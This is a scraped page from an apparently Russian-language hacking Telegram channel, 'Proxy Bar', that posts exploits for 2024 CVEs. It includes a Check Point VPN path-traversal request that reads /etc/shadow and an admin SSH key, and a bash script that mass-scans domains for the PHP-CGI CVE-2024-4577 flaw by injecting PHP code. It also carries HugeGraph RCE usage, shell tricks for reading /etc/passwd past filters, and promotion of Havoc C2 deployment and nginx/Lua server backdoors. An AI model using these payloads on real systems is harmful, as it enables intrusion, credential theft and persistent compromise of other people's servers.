Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
76 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow


#0day #checkpoint
🔥38👍8
CVE-2024-24919 Check Point Remote Access VPN 0-Day
Ну или так 👌
aCSHELL/../../../../../../../
home/admin/.ssh/id_rsa

*
ssh admin@Хостъ -i id_rsa

#shitPointVPN #0Day
🔥50👍2
fuck yeah !
*
ansible-havoc
*
Bash cкрипты/ansible для развертывания Havoc на Linode и настройки и SSL
*
download

#C2 #ansible
👍29🔥2
Доброй ночи.
Написал небольшую книжку\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org

#book #linux #hex
🔥155👍40😱6
CVE-2024-21512 MySQL2
*
Дырка в библиотеке MySQL для Node.js
*
POC

#mysql
🔥23
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-5326 WordPress
*
Post Grid Gutenberg и плагин PostX = 4.1.2
User Contributor включает регистрацию новых пользователей и устанавливает роль по умолчанию для новых пользователей — Администратор.
*
POC exploit

#wordpress #exploit
🔥26👍3
Unlock Docker (Россия, Куба, Иран, Судан, Сирия, КимЧенЫновка)
*
BASH noscript
*
#dogger
👍26😱8🔥5
Вышел PagedOut
Июнь 2024
*
почитать PDF

#ezine #hacking #tricks #coding
🔥8👍4
CVE-2024-36801 SemСms
*
sql injection для версии Semcms v 4.8
*
SQLi + POC
🔥9
CVE-2024-27822 macOS PackageKit
*
LPE
*
Для версий:
macOS 14.5 Beta 1 (23F5049f) and older
macOS 13.6.6 (22G630) and older
macOS 12.7.4 (21H1123) and older
Any version of macOS 11 or older
*
writeUp
*
exploit

#macos #lpe
👍4😱1
CVE-2024-27348 RCE в Apache HugeGraph Server
*
Usage:
python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"

*
POC exploit

#apache #rce
🔥10
Proxy Bar pinned a photo
CVE-2024-4577 Argument Injection in PHP-CGI
*
При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.
*
fofa link (610,604 хостов)

#php #xamp
👍14
CVE-2024-4577 Argument Injection in PHP-CGI
ДОПОЛНЕНИЕ к предыдущему посту
BASH:
#!/bin/bash

# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
-H "User-Agent: curl/8.3.0" \
-H "Accept: */*" \
-H "Content-Length: 23" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "<?php phpinfo(); ?>" \
--max-time 10)

if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
fi
}

# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
check_vulnerability "$domain"
done < "$file"
}

# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <domain_list_file>"
exit 1
fi

# Call the main function with the domain list file
main "$1"


*
Сохраняйте скрипт и по списку доменов:
./CVE-2024-4577_noscript.sh /path/to/domains-list

#php #xamp
🔥12
This media is not supported in your browser
VIEW IN TELEGRAM
DDOS для самых маленьких

#pic
🔥62👍14😱2
😱8
CVE-2024-30078.poc
2.9 KB
🔥22👍7😱2
How To Harden Active Directory To Prevent Cyber Attacks
Вебинар
PDF
Не поленитесь открыть PDF, можно даже не читать, картинки ТОП.

#ad #sec
👍14🔥7
BYPASS

cat ${HOME:0:1}etc${HOME:0:1}passwd

`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`

cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

cat `xxd -r -ps <(echo 2f6574632f706173737764)`
🔥30😱14👍8
Вчера на ночь глядя стукнула мысль, как бы реализовать редирект юзера в зависимости от правильно\неправильно был дан ответ на http basic authentication (который на nginx).
Ну то есть если логин\пароль верный - отправило на правильный сайт.
логин\пароль не верный - юзер ушел на страницу сбора данных (разрешение экрана, вебка и тд). ну или просто в лог писать.
Добрый гугл сказать соединить nginx + LUA.
После слова Lua я про первую мысль как то подзабыл.
Варианта три:
1 - собрать руками джинс + луа
2 - докер
3 - OpenResty
Сам по себе Lua открывает тонну возможностей для хороших и не очень😝 целей.
Как минимум можно получать webshell просто описав vhost (самый обычный nginx + пара строк на Lua) ну или получать полноценный lua cli
Оказвается нормальные пацаны уже сделали, гит ломится от решений.
Почитайте короткую статейку )
Backdooring OpenResty Servers

#ЯбудуЗватьТебяЛУ #nginx
🔥14👍3